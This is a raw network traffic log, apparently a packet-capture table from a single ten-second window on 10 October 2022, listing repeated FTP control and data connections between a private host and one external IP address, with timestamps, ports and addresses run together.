                                                                                                                                    Oct 10, 2022 06:03:53.929667950 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.929950953 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.930371046 CEST5008464740192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.955909967 CEST6474050084185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.959387064 CEST5008464740192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.959606886 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.987550020 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:53.991066933 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:53.991544962 CEST5008464740192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.015892029 CEST6474050084185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.015963078 CEST6474050084185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.016055107 CEST5008464740192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.018281937 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.018450022 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.018553019 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.043209076 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.043273926 CEST2150083185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.043400049 CEST5008321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.152003050 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.178029060 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.179172039 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.217379093 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.217444897 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.217479944 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.217732906 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.222973108 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.246968985 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.247241020 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.247426033 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.271327972 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.275490999 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.275744915 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.299959898 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.300435066 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.300601959 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.324978113 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.326632023 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.327048063 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.353704929 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.353905916 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.354854107 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.380363941 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.381373882 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.382016897 CEST5008664741192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.404647112 CEST6474150086185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.404757977 CEST5008664741192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.405013084 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.429776907 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.429879904 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.430607080 CEST5008664741192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.453177929 CEST6474150086185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.453303099 CEST6474150086185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.453499079 CEST5008664741192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.454097033 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.454874992 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.454993963 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.480205059 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.480254889 CEST2150085185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:54.480570078 CEST5008521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:54.601782084 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.635447025 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.635617018 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.661215067 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.661257982 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.661283970 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.661335945 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.661370993 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.661546946 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.684190035 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.684289932 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.684416056 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.707448006 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.707576036 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.708271027 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.731100082 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.731229067 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.731584072 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.754692078 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.754781961 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.755150080 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.778633118 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.778749943 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.780359983 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.803649902 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.803842068 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.804183006 CEST5008864742192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.827569962 CEST6474250088185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.827714920 CEST5008864742192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.827986956 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.851818085 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.851919889 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.852598906 CEST5008864742192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.875494957 CEST6474250088185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.875627041 CEST6474250088185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.875665903 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.875792027 CEST5008864742192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.875819921 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.876046896 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:55.898469925 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.898504972 CEST2150087185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:55.898556948 CEST5008721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.013250113 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.037381887 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.037545919 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.065210104 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.065268040 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.065304995 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.065346003 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.065346003 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.065376043 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.068557978 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.092892885 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.093169928 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.093586922 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.117925882 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.118333101 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.118798971 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.142293930 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.142402887 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.142944098 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.168447018 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.168555021 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.170063019 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.194113970 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.194350958 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.195173979 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.221625090 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.222009897 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.222835064 CEST5009064743192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.247204065 CEST6474350090185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.247431040 CEST5009064743192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.247752905 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.275382042 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.275522947 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.285224915 CEST5009064743192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.309429884 CEST6474350090185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.309494019 CEST6474350090185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.309582949 CEST5009064743192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.310560942 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.310638905 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.310786963 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.335933924 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.335989952 CEST2150089185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.336078882 CEST5008921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.467175961 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.490190029 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.490367889 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.517122030 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.517164946 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.517180920 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.517332077 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.517505884 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.540863991 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.541024923 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.585004091 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.608364105 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.608676910 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.763937950 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.787090063 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.787317038 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.841212988 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.864757061 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.864979029 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.865367889 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.888106108 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.891182899 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.926199913 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.949796915 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.951122046 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.951497078 CEST5009264745192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.974759102 CEST6474550092185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:56.978250980 CEST5009264745192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:56.978820086 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.002273083 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.003628016 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.026757956 CEST5009264745192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.049787045 CEST6474550092185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.050153971 CEST6474550092185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.050189018 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.050328970 CEST5009264745192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.050328970 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.050534010 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.072989941 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.073220015 CEST2150091185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.073484898 CEST5009121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.279249907 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.303808928 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.303992987 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.330847979 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.330977917 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.331010103 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.331156969 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.335009098 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.357772112 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.381843090 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.381987095 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.382234097 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.405963898 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.407677889 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.415124893 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.439899921 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.443654060 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.491251945 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.516221046 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.516392946 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.520245075 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.543781042 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.547673941 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.958065987 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:57.985816956 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:57.986057997 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.020756006 CEST5009464746192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.046014071 CEST6474650094185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.046168089 CEST5009464746192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.046457052 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.071624994 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.071888924 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.097095966 CEST5009464746192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.120826960 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.120940924 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.122394085 CEST6474650094185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.122430086 CEST6474650094185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.122571945 CEST5009464746192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.122940063 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.148675919 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.148727894 CEST2150093185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.148929119 CEST5009321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.312653065 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.335607052 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.335773945 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.362493992 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.362549067 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.362658978 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.362847090 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.362847090 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.366389990 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.389357090 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.389720917 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.423511028 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.446824074 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.447098017 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.447216988 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.470837116 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.471034050 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.475332022 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.498678923 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.499049902 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.565574884 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:58.589014053 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:58.589296103 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.185056925 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.209181070 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.209383965 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.258557081 CEST5009664748192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.283056974 CEST6474850096185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.283235073 CEST5009664748192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.285825968 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.309169054 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.309453964 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.353291988 CEST5009664748192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.377027035 CEST6474850096185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.377161026 CEST6474850096185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.377249956 CEST5009664748192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.377827883 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.377911091 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.386893034 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.409702063 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.409754038 CEST2150095185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.409915924 CEST5009521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.544384003 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.569750071 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.569890022 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.598258018 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.598306894 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.598340034 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.598356962 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.598378897 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.598390102 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.598587990 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.623230934 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.623357058 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.624073029 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.648813009 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.649002075 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.652796030 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.678145885 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.678272009 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.678461075 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.703923941 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.704021931 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.704864025 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.730492115 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.730601072 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.733311892 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.758306980 CEST2150097185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:59.758985043 CEST5009721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.761559963 CEST5009864749192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:59.788887978 CEST6474950098185.106.92.60192.168.2.3
